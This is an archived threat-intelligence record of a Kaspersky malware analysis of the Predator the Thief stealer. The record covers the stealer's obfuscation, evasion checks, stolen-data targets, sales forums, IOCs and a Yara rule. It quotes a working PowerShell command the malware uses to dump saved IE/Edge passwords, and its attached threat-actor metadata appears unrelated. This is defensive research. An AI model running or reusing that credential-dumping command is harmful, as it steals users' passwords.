{
	"id": "8c937e48-f05f-4e61-808e-2a07c8a37724",
	"created_at": "2026-04-06T00:11:01.570508Z",
	"updated_at": "2026-04-10T03:36:48.242443Z",
	"deleted_at": null,
	"sha1_hash": "4d3ad4e1229a702178dbdef5acb4d800acebbba6",
	"title": "A predatory tale: Who’s afraid of the thief?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1425296,
	"plain_text": "A predatory tale: Who’s afraid of the thief?\r\nBy GReAT\r\nPublished: 2019-03-11 · Archived: 2026-04-05 17:06:41 UTC\r\nIn mid-February, Kaspersky Lab received a request for incident response from one of its clients. The individual who\r\ninitially reported the issue to our client refused to disclose the origin of the indicator that they shared. What we do know is\r\nthat it was a screenshot from one of the client’s internal computers taken on February 11 while an employee was\r\napparently browsing through his emails. In addition, the anonymous source added that the screenshot was transferred to a\r\nC2 using a stealer dubbed ‘Predator’.\r\nAs soon as the client contacted us, we started conducting a full investigation into the infected machine, including memory\r\ndumps, event logs, environment indicators from the network and so on. Finding very little information about\r\nthis tool, we decided that, since we had already dived into the stealer, we might as well share some of our main\r\nfindings in case other incidents occur in the future. The purpose of this blogpost is to enumerate the Predator stealer’s\r\nversions, technical features, indicators and Yara rule signatures, to help monitor and detect new samples, and to provide\r\ngeneral information about its owners’ activities.\r\nAs well as all the information we collected from the client, we went the extra mile and contacted a source who had\r\npreviously analyzed Predator. This source was @Fumik0_, a French malware researcher who analyzed versions 2.3.5 and\r\n2.3.7 in his blog just a few months ago (October 2018).\r\nHe joined Ido Naor, a principal security researcher at Kaspersky Lab, and together they compiled a full analysis of the new\r\nversions of ‘Predator the thief’.\r\nThe blog was apparently so influential that the owners of the stealer decided to contact Fumik0 via Twitter. 
An account\r\nnamed Alexuiop1337 claiming to be the owner of Predator is also active and has been responding to Fumik0’s discoveries\r\nuntil fairly recently.\r\nPredator the thief\r\nPredator is a data stealer developed by Russian-speaking individuals. It’s being sold cheaply on Russian forums and has\r\nbeen detected many times in the wild. Although detection is successful with previous versions, its owners are rapidly\r\nadapting by generating FUD (Fully UnDetectable) samples every few days. The owners are not responsible for the victim\r\nattack vector and are only selling the builder. For a small additional payment they can also generate an administration\r\npanel for customers. The newest samples were exposed on their Telegram group; however, the links only redirect to a\r\nlittle-known AV aggregator which we don’t have access to. We’re currently tracking the samples’ hashes and waiting for\r\ntriggers to show up.\r\nLatest version: v3.0.7\r\nSample MD5: bf4cd781920f2bbe57e7e74a775b8e94\r\nCode Language: C++\r\nFile Types: PE\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 1 of 11\n\nSupported Arch.: x86 and x64\r\nUnpacked Size: \u003c500Kb\r\nAdmin Panel Example: https://predatortop.xyz/login\r\nAdmin Panel Software: PHP, Apache, Ubuntu\r\nFrom v2 to v3\r\nPredator, as a stealer, is considered simple and cheap. It’s good for attacking individuals and small businesses, but as far\r\nas large companies go, protection solutions and response teams can detect and remove its activity in a relatively short\r\namount of time.\r\nThat said, the owners of Predator are very business oriented. They’re constantly updating their software, attempting to\r\nextend features and adjusting to client requirements, and are generally not that aggressive when it comes to\r\ndisclosure/analysis of their tool.\r\nObfuscation\r\nPredator’s owners decided to obfuscate most of its code with a number of simple techniques. 
XOR, Base64, substitutions,\r\nstack strings and more are being used to hide API methods, folder paths, registry keys, the C2 server/admin panel and\r\nso on.\r\nWe sketched a flow chart for one of the obfuscation techniques. A large chunk of code boiled down to one Windows API\r\ncall, which we see as a bit of overkill considering that other techniques can be applied to strip the obfuscation.\r\nWe’ve written down a list for those who are after a step-by-step guide:\r\nStep Description\r\n0 Save the arguments somewhere\r\n1 Get the function name\r\n2 Get the library name\r\n3 Recreate GetProcAddress\r\n4 Call the function by a simple register call\r\nExport table\r\nIt was also found that the export table trick for getting the API function is far more complex than the one introduced in v2.\r\nAnti-debugging/sandbox checks\r\nPredator retains its old techniques for sandbox evasion, but keeps adding more and more features. One of them, for\r\nexample, is a hardcoded list of DLLs that are checked to see whether they are loaded into memory:\r\nsbiedll dbghelp api_log pstorec dir_watch vmcheck wpespy SxIn Sf2\r\nLoop for checking list of DLLs\r\nOne old trick, for example, that survived the version update is the check of the graphics card name introduced in v2.x.x.\r\nClassy but mandatory – browser stealer support\r\nEdge and Internet Explorer support was recently added to the list of browsers. The actions taken, however, are different\r\nfrom the malware decision-making with the Gecko and Chromium browsers. 
In previous versions, Predator usually used a\r\ntemporary file (*.col format file) to store browser content (in an SQLite3 database), but for Edge and IE it was replaced\r\nwith a hardcoded PowerShell command that will directly put the content of the file into a dedicated repository.\r\npowershell.exe -Command\r\n\"[void]\r\n[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault\r\n= New-Object Windows.Security.Credentials.PasswordVault; $b = 'Browser: Internet Explorer | Edge'; $a =\r\n($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ } | SELECT UserName, Password, Resource | Format-List\r\nResource, UserName, Password) | Out-String; $c = $b + $a; $c = $c.Replace('Resource :', 'Url:').Replace('UserName\r\n:', 'Login:').Replace('Password :', 'Password:'); $c \u003e \"%PREDATOR_PATH%\\General\\IeEdgePasswords.txt\"\r\nAs a reminder, Predator currently supports the following list of browser data theft, according to the info on the ‘official’\r\nsales page:\r\nThe false keylogger feature\r\nThe owners of Predator list keylogger capabilities among its features, though a closer inspection of the code reveals that\r\nno keylogging is carried out. The behavior we captured is clearly that of a clipboard stealer. The functionality includes a\r\ncrawler that checks if the clipboard contains data, grabs it and places it in a dedicated file the stealer owners have named\r\n‘information.log’.\r\nThief logs\r\nDiving into the file discussed in the clipboard stealer section above, we saw drastic changes from previous versions. The\r\ninformation logger is perhaps the most important collector of Predator. 
It stores all the tasks performed by the stealer on\r\nthe victim machine.\r\nWe noticed that in previous minor versions, logs started collecting data that might be of interest to potential customers,\r\nsuch as:\r\nHWID\r\nSystem Language\r\nKeyboard Layout\r\nAt the end of the report, the owners added a customer/payload ID – probably to improve support.\r\nUpdates\r\nPredator is continually integrating new software into the stealing list and fixing bugs to maintain its stability and its\r\npopularity. Here’s a summary of the new features in v3:\r\nLocation: Data stolen\r\nGames: Osu, Battle.net\r\nFTP: WinSCP\r\nVPN: NordVPN\r\n2FA: Authy\r\nMessengers: Pidgin, Skype\r\nOperating System: Webcam, HWID, Clipboard, Specific document files (Grabber), Project filenames*\r\nBrowsers: IE/Edge\r\n*We noticed that the newest version of Predator has started collecting a list of .sln file names. These are project files\r\nusually generated by Visual Studio. We still have no idea if this is related to client demand for a future feature.\r\nSale point (Russian forums)\r\nWe found a very active seller of Predator on a forum called VLMI. It appears the main language on VLMI is Russian and\r\nthe content mainly revolves around cyberattacks. In addition, the forum has a very strict set of rules that might get you\r\nbanned if broken. 
The two sections (translated using Google) in the image below are examples of forbidden behavior.\r\nIt also appears that each offer on the forum must go through a reviewer who decides if the piece of software or\r\nservice is of financial benefit to the forum administrators, but at the same time fair towards other members.\r\nFor 8,000 rubles (~$120) worth of software, the forum will charge a 20% fee; if the value goes above 100,000 rubles\r\n(~$1,500), the commission decreases to 10%.\r\nThe Predator stealer’s main sales thread was found here:\r\nhttps://vlmi.biz/threads/predator-the-thief-nativnyj-stiller-s-bolshim-funkcionalom-luchshaja-cena.21069/\r\nPredator costs 2,000 rubles (~$30) for the stealer and admin panel. There is also an optional service to help the customer\r\ninstall the C\u0026C. This is not as expensive as other stealers on the market, such as Vidar and HawkEye, but its developers\r\nare proactive in delivering updates and ensuring a fast and effective support service.\r\nTelegram as a service\r\nPredator’s main channel for updating their customers is Telegram. At the time of writing, the administrators were hosting\r\nover 370 members in this group:\r\nhttps://t.me/PredatorSoftwareChannel\r\nAnother update channel is the seller @sett9.\r\nIt appears the Predator administrators are demonstrating FUD capabilities by running a sample generated by the builder of\r\ntheir stealer. 
However, some samples from their latest update (v3.0.7) have already been detected by Kaspersky products\r\nas Trojan-PSW.Win32.Predator.qy (25F9EC882EAC441D4852F92E0EAB8595), while others are detected by\r\nheuristics.\r\nhttps://scanmybin.net/result/af76a5666e5230cf087c270c51c2dfdc4324c365dc6f93c0f3ae7ce24f9db992\r\nhttps://run4me.net/result/80163ed2bede58aff68a3bdf802917c61c78a05f37a3caf678ce5491f00d39b0\r\nThe executables above were not found in VirusTotal. According to the group, the links were posted around August of last\r\nyear (2018). Numerous media uploads on the Telegram group revealed dozens of infected victims.\r\nOn the day we looked at the Telegram group (February 17, 2019), the latest build (v3.0.7) was released. According to the\r\nowners’ release notes, it added WinSCP and NordVPN support.\r\nIOCs\r\nIP/Domains:\r\nPredator version IP/Domain\r\nv3.0.3 15charliescene15[.]myjino[.]ru\r\nv3.0.4 axixaxaxu1337[.]us\r\nv3.0.5 madoko[.]jhfree[.]net\r\nv3.0.6 kristihack46[.]myjino[.]ru\r\nv3.0.7 j946104[.]myjino[.]ru\r\nHashes:\r\nPredator version MD5 Hash\r\nv3.0.3 c44920c419a21e07d753ed607fb6d7ca\r\nv3.0.4 cf2273b943edd0752a09e90f45958c85\r\nv3.0.5 b2cbb3d80c8d830a3b3c2bd568ba1826\r\nv3.0.6 dff67a78bb4866f9da5a0c1781ed5348\r\nv3.0.7 25F9EC882EAC441D4852F92E0EAB8595\r\nYara:\r\nrule Predator_The_Thief : Predator_The_Thief {\r\n   meta:\r\n       description = \"Yara rule for Predator The Thief 3.0.0+\"\r\n       author = \"Fumik0_\"\r\n       date = \"2018/10/12\"\r\n       update = \"2019/02/26\"\r\n   strings:\r\n       $mz = { 4D 5A }\r\n       /*\r\n           Predator V3.0.0+\r\n       */\r\n       $x1 = { C6 84 24 ?? ?? 00 00 8C }\r\n       $x2 = { C6 84 24 ?? ?? 
00 00 1A }\r\n       $x3 = { C6 84 24 ?? ?? 00 00 D4 }\r\n       $x4 = { C6 84 24 ?? ?? 00 00 03 }\r\n       $x5 = { C6 84 24 ?? ?? 00 00 B4 }\r\n       $x6 = { C6 84 24 ?? ?? 00 00 80 }\r\n       /*\r\n           Predator V3.0.3 -\u003e 3.0.6\r\n       */\r\n       $y1 = { B8 00 E1 F5 05 }\r\n       $y2 = { 89 5C 24 0C }\r\n       $y3 = { FF 44 24 ?? }\r\n       $y4 = { 39 44 24 0C }\r\n       $y5 = { BF 00 00 A0 00 }\r\n   condition:\r\n       $mz at 0 and\r\n       (\r\n            ( all of ($x*))\r\n            or\r\n            (all of ($y*))\r\n       )\r\n}\r\nSource: https://securelist.com/a-predatory-tale/89779",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securelist.com/a-predatory-tale/89779"
	],
	"report_names": [
		"89779"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434261,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4d3ad4e1229a702178dbdef5acb4d800acebbba6.pdf",
		"text": "https://archive.orkl.eu/4d3ad4e1229a702178dbdef5acb4d800acebbba6.txt",
		"img": "https://archive.orkl.eu/4d3ad4e1229a702178dbdef5acb4d800acebbba6.jpg"
	}
}